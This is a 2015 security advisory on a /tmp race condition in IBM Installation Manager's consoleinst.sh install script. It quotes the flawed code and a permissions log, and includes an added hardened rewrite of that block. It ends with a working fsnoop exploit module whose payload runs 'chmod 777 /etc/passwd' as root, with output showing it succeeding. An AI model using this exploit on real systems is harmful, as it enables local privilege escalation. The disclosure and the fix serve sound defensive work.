Title: /tmp race condition in IBM Installation Manager V1.8.1 install script
Author: Larry W. Cashdollar, @_larry0
Date: 2015-10-29
Download Site: http://www-03.ibm.com/software/products/en/appserv-wasfordev
Vendor: IBM
Vendor Notified: 0000-00-00
Vendor Contact:
Description: IBM Installation Manager is a command line utility to install
various software packages developed by IBM.
=====> IBM Installation Manager> Password required
Credentials are required to connect to the IBM download site. Enter IBM ID
and password.
Select:
P. Provide credentials and connect
C. Cancel
Select 'P' to enter credentials and connect, or 'C' to cancel.
Forgot your IBM ID?
https://www.ibm.com/account/profile?page=forgotuid
Forgot your password?
https://www.ibm.com/account/profile?page=forgot
IBM ID help and FAQ
https://www.ibm.com/account/profile/us/en?page=regfaqhelp
-----> C
Vulnerability:
I noticed a /tmp race condition in IBM's Installation Manager software
install script.
The code in consoleinst.sh is:
46 TEMP=/tmp
47 tempScript=$TEMP/consoleinst-$$.sh
48 scriptLoc=`dirname "$0"`
49 slash=`expr "$scriptLoc" : "\(/\)"`
50 if [ "X$slash" != "X/" ]; then
51 scriptLoc=`pwd`/$scriptLoc
52 fi
53
54 if [ "$0" != "$tempScript" ]; then
55 cp "$0" "$tempScript"
56 cd "$TEMP"
57 origScriptLoc=$scriptLoc
58 export origScriptLoc
59 exec "$tempScript" $@
60 # should not return from above exec
61 exit 1
62 fi
If you guess the PID and create the file before the installer script does,
you can inject code that is then executed at line 59.
This is a log of me controlling permissions of the file during installation
of the product:
[M] -rwxrwxrwx 1 larry larry 34 Thu Oct 29 21:46:10 2015
/tmp/consoleinst-9999.sh
[U] -rwxrwxrwx 1 larry larry 0 Thu Oct 29 21:46:34 2015
/tmp/consoleinst-10382.sh
[U] -rwxrwxrwx 1 larry larry 2225 Thu Oct 29 21:46:34 2015
/tmp/consoleinst-10382.sh
If I'm able to write to that file directly after it's modified (inotify() for
the win) I could inject commands into that installation script.
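A hardened replacement for the TEMP/tempScript block above, as an added example (not IBM's code and not part of the advisory): the copy goes into a freshly created, mode-0700 directory with an unpredictable name, the create refuses to overwrite an existing path, and the staged file is re-checked for symlink/FIFO/ownership/mode immediately before it would be exec'd. It assumes GNU mktemp(1) and stat(1).

```shell
#!/bin/sh
# Hardened replacement for the TEMP/tempScript block in consoleinst.sh.
# Added example, not IBM's code. Assumes GNU mktemp(1) and stat(1).

# Create a private (0700) directory with an unpredictable name under TMPDIR.
make_private_tmpdir() {
    d=$(mktemp -d "${TMPDIR:-/tmp}/consoleinst.XXXXXXXXXX") || return 1
    chmod 700 "$d" || { rm -rf "$d"; return 1; }
    printf '%s\n' "$d"
}

# Copy the installer ($1) into a fresh private directory and print the path.
# The name is no longer derivable from a PID, and set -C (noclobber) makes
# the initial create fail instead of writing into a pre-created file.
stage_script() {
    src=$1
    dir=$(make_private_tmpdir) || return 1
    dst="$dir/consoleinst.sh"
    (set -C; : > "$dst") 2>/dev/null || { rm -rf "$dir"; return 1; }
    cat "$src" > "$dst" || { rm -rf "$dir"; return 1; }
    chmod 700 "$dst" || { rm -rf "$dir"; return 1; }
    printf '%s\n' "$dst"
}

# Re-check the staged copy right before it would be exec'd: it must be a
# regular file (not a symlink or FIFO), owned by us, and not group/other-writable.
verify_staged() {
    f=$1
    [ -f "$f" ] && [ ! -L "$f" ] && [ -O "$f" ] || return 1
    mode=$(stat -c '%a' "$f" 2>/dev/null) || return 1
    case "$mode" in
        *[2367][0-7]|*[2367]) return 1 ;;   # group or other write bit set
    esac
    return 0
}

# Stage and verify in one step; the caller would then run
#   exec "$staged" "$@"   (the role of line 59 in the original script).
stage_and_check() {
    staged=$(stage_script "$1") || return 1
    verify_staged "$staged" || { rm -rf "$(dirname "$staged")"; return 1; }
    printf '%s\n' "$staged"
}
```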
CVEID:
OSVDB:
Exploit Code:
/*
fsnoop v3.3 module for exploitation of:
http://www.vapidlabs.com/advisory.php?v=156
special thanks to v14dz for getting this working, and Mudge @dotmudge for
pointing me
at his /tmp race condition tool l0pht-watch.
@v14dz
http://vladz.devzero.fr/
$ make ibm-console.so
/tmp/x is :
#!/bin/sh
chmod 777 /etc/passwd
$ ./fsnoop -p ibm-consoleinst.so
[+] ./ibm-consoleinst.so: ** IBM Console Install Exploit **
[+] ./ibm-consoleinst.so: payload=[0xb77775fb]
file=[/tmp/consoleinst-HEREPID.sh]
[+] ./ibm-consoleinst.so: waiting for command: "/bin/sh ./consoleinst.sh"
[+] ./ibm-consoleinst.so: Exploitation done.
[+] ./ibm-consoleinst.so: Unloading module.
ls -l /etc/passwd
-rwxrwxrwx 1 root root 1901 Nov 22 2014 /etc/passwd
*/
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
char title[] = "** IBM Console Install Exploit **";
/* filters */
char proc_name[] = "/bin/sh ./consoleinst.sh";
char file[] = "/tmp/consoleinst-HEREPID.sh";
/* Evil routines */
void payload() {
int fd;
/*from v14dz: I use a fifo here, to unlock the paymod execution right after
the cp command*/
mkfifo(file, 0666);
fd = open(file, O_RDONLY);
rename(file, "/tmp/a");
rename("/tmp/x", file);
}
Screen Shots:
Advisory: http://www.vapidlabs.com/advisory.php?v=156